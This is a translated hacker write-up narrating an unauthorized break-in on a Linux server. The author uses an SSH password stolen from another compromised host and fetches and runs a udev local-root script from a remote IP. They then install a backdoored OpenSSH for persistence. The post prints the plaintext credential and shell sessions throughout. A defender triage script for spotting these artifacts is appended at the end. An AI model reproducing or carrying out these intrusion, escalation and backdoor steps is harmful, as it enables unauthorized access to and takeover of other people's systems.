A simple manual intrusion process on a Linux zombie host ("broiler")

Source: Internet
Author: User

Today, I found someone's ssh on a zombie is connected to another server, and the password is recorded.

[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11

SSH straight in with it.

[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11's password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m

[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

Right, RHEL 5.0 with the kernel never upgraded. The vmsplice local root should be fine; in testing it crashed the machine, though, so udev works better.

[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
--13:21:09--  http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... 200 OK
Length: 3366 (3.3K) [application/x-sh]
Saving to: `u.sh'

100%[==========================================>] 3,366       --.-K/s   in 0.04s

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls
r00t  r00t.c  u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f69f8800 0   2486   00000111 0        0        00000000 2
f7fdae00 0   0      00000000 0        00000000 2
c2132200 6   0      00000000 0        0        00000000 2
f6a57a00 7   2143   00000001 0        0        00000000 2
f7caf000 7   0      00000000 0        0        00000000 2
f6a0be00 9   2143   00000000 0        0        00000000 2
f6a61200 9   1996   00000000 0        0        00000000 2
f7de1c00 9   0      00000000 0        0        00000000 2
f7d6ca00 10  0      00000000 0        0        00000000 2
f7fb3200 11  0      00000000 0        0        00000000 2
c2154200 15  476    ffffffff 0        0        00000000 2
f7fdac00 15  0      00000000 0        0        00000000 2
f7fb3000 16  0      00000000 0        0        00000000 2
c21cde00 18  0      00000000 0        0        00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root       477  0.0  0.0   2916  1396 ?        S<   /sbin/udevd -d
ldc       3462  0.0  0.0   4128       pts/0    S    grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c:
suid.c:3:

sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

That's root already.

sh-3.1# w
 13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

Leave an SSH backdoor first.

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08--  http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 200 OK
Length: 979990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz'

100%[==========================================>] 979,990     1.14M/s   in 0.8s

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............ (several lines omitted)

sh-3.1# make && make install
conffile=`echo sshd_config.out | sed 's/.out$//'`;
/bin/sed -e s|/etc/ssh/ssh_prng_cmds|g -e
............ (several lines omitted)

sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
Stopping sshd:                                             [  OK  ]
Starting sshd:                                             [  OK  ]

OK. Log in with our sshdoor.

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2298/hpiod
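The session above leaves three artifacts on the victim that a defender can look for: a credential file under /tmp in user:password@host form, a hidden build directory (.v) with exploit sources under a user's home, and an OpenSSH built from source and installed over /usr, so /usr/sbin/sshd no longer matches the openssh-server package. The triage script below is an added defender-side example, not from the original post; it assumes those paths and an RPM-based host, and takes an optional root prefix (my addition) so the file checks can also run against a mounted copy of a suspect filesystem.

```shell
#!/bin/sh
# Added triage script, not from the original post. Checks for the three
# artifacts the write-up leaves behind: a credential drop under /tmp in
# user:password@host form, a hidden build directory under /home/<user>/
# holding C sources or shell scripts, and an sshd binary that no longer
# matches its RPM. ROOT is an assumed prefix so the file checks can run
# against a mounted or staged copy of a suspect filesystem.

# Print files under $1/tmp whose contents include user:password@IPv4 lines.
find_credential_drops() {
    find "$1/tmp" -maxdepth 2 -type f -size -64k 2>/dev/null |
    while IFS= read -r f; do
        grep -Eq '^[A-Za-z0-9_-]+:[^[:space:]@]+@[0-9]{1,3}(\.[0-9]{1,3}){3}' "$f" &&
            printf '%s\n' "$f"
    done
}

# Print hidden directories directly under $1/home/<user>/ that contain
# .c or .sh files (so ~/.ssh with only keys in it is not reported).
find_hidden_build_dirs() {
    find "$1/home" -mindepth 2 -maxdepth 2 -type d -name '.*' 2>/dev/null |
    while IFS= read -r d; do
        find "$d" -maxdepth 1 -type f \( -name '*.c' -o -name '*.sh' \) 2>/dev/null |
            head -n 1 | grep -q . && printf '%s\n' "$d"
    done
}

# Read `rpm -V openssh-server` output on stdin; exit 0 if /usr/sbin/sshd is
# reported missing or with a size (S) or digest (5) change, 1 otherwise.
sshd_rpm_modified() {
    awk '$NF == "/usr/sbin/sshd" && ($1 == "missing" || $1 ~ /[S5]/) { hit = 1 }
         END { exit (hit ? 0 : 1) }'
}

# Run every check against ROOT (default /); return 1 if anything was found.
# The RPM check only makes sense on the live host, so it is skipped for a prefix.
triage() {
    root=${1:-/}; root=${root%/}; rc=0
    find_credential_drops "$root" | sed 's/^/credential drop: /' | grep . && rc=1
    find_hidden_build_dirs "$root" | sed 's/^/hidden build dir: /' | grep . && rc=1
    if [ -z "$root" ] && command -v rpm >/dev/null 2>&1; then
        rpm -V openssh-server 2>/dev/null | sshd_rpm_modified &&
            { echo 'sshd differs from the openssh-server RPM'; rc=1; }
    fi
    return "$rc"
}
```

Source the file and call `triage` on the live host, or `triage /mnt/suspect` on a mounted image; a non-zero return means at least one artifact was reported. A clean `rpm -V` result is only meaningful if the RPM database itself is trusted, so compare against a known-good package when in doubt.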
